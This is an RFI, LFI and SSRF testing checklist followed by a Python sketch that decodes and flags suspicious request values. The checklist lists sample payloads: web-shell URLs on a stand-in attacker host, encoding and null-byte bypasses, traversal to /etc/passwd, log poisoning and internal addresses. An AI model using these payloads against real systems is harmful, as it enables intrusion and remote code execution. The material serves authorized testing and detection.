  1. Initial Information Gathering

    • Identify and map all endpoints that accept file path or URL inputs.
    • Review source code (if available) to understand file handling mechanisms.
    • Check for endpoints where URLs or file paths are passed as parameters in URLs, headers, or body.
  2. Basic RFI Testing

    • Try including remote files hosted on different servers, for example:
      • http://Attacker.com/shell.txt
      • http://Attacker.com/shell.php
      • ftp://Attacker.com/shell.txt
      • ftp://Attacker.com/shell.php
  3. URL Manipulation

    • Use different URL schemes (HTTP, HTTPS, FTP).
    • Use different file extensions (e.g., .txt, .php, .jpg).
    • Test bypass techniques for URL filters and restrictions:
      • Using URL encoding: http%3A%2F%2Fattacker.com%2Fshell.txt
      • Using double URL encoding: http%253A%252F%252Fattacker.com%252Fshell.txt
      • Using mixed-case URLs: hTtP://aTtAcKeR.com/sHeLl.TxT
  4. Advanced URL Manipulation Techniques

    • Test for double encoding vulnerabilities.
    • Try bypassing filters with non-standard encodings and mixed encodings.
    • Use variations of URLs to bypass filters:
      • http://attacker.com/shell.txt%00.jpg
      • http://attacker.com/shell.txt?.jpg
      • http://attacker.com/shell.txt#.jpg
  5. File Upload and Inclusion

    • Check if file upload functionalities are present and try uploading files for inclusion.
    • Test inclusion of uploaded files to execute code (e.g., web shells).
  6. Log Poisoning and Inclusion

    • Inject a payload into the User-Agent, Referer, or other headers.
    • Include poisoned log files to execute injected payloads.
  7. Error Handling and Response Analysis

    • Analyze server responses for clues about the presence of RFI vulnerabilities.
    • Look for error messages that disclose file paths or other sensitive information.
    • Verify if application stack traces are exposed in responses.
  8. Local File Inclusion (LFI) Fallback Testing

    • If RFI is not possible, test for Local File Inclusion (LFI) vulnerabilities.
    • Test common LFI payloads to include local files:
      • ../../../../etc/passwd
      • ..%2F..%2F..%2F..%2Fetc%2Fpasswd
      • ../../../../../../../../../../../etc/passwd
  9. Server-Side Request Forgery (SSRF)

    • Test for SSRF vulnerabilities that can be exploited to achieve RFI.
    • Attempt to include internal resources via SSRF:
      • http://localhost:8080/
      • http://127.0.0.1/
      • http://internal-service/
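
The encoding, suffix, traversal and internal-address variants in items 3, 4, 8 and 9 all collapse to a few patterns once the value is canonicalized, which is what a filter or log detection has to do before matching. The following Python sketch is an added example, not part of the original checklist; the finding labels, the function names and the `INTERNAL_NAMES` policy are assumptions made for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote, urlsplit

INTERNAL_NAMES = {"localhost", "internal-service"}  # assumed site policy
REMOTE_SCHEME = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def canonicalize(value, max_rounds=5):
    """Percent-decode until stable so single and double encoding collapse
    to one string. Returns (decoded_value, rounds_needed)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def is_internal(host):
    """True for loopback/private addresses and names on the internal list."""
    try:
        ip = ipaddress.ip_address(host)
        return ip.is_loopback or ip.is_private or ip.is_link_local
    except ValueError:
        return host in INTERNAL_NAMES


def classify(value):
    """Return sorted findings for one request parameter value."""
    decoded, rounds = canonicalize(value)
    findings = set()
    if rounds > 1:
        findings.add("multi-encoded")
    if "\x00" in decoded:
        findings.add("null-byte")
    if REMOTE_SCHEME.match(decoded):  # case-insensitive, catches hTtP://
        parts = urlsplit(decoded)
        host = (parts.hostname or "").lower()
        findings.add("ssrf-internal" if is_internal(host) else "remote-url")
        # "?.jpg" / "#.jpg" make a URL end in an allowed extension.
        if (parts.query or parts.fragment).startswith("."):
            findings.add("suffix-mask")
    if "../" in decoded.replace("\\", "/"):
        findings.add("path-traversal")
    return sorted(findings)


if __name__ == "__main__":
    for sample in ("http%253A%252F%252Fattacker.com%252Fshell.txt",
                   "..%2F..%2F..%2F..%2Fetc%2Fpasswd", "http://127.0.0.1/"):
        print(sample, "->", classify(sample))
```

Matching on the canonical form is only a detection aid; the include or fetch target itself should be resolved from a server-side allowlist rather than from the request value.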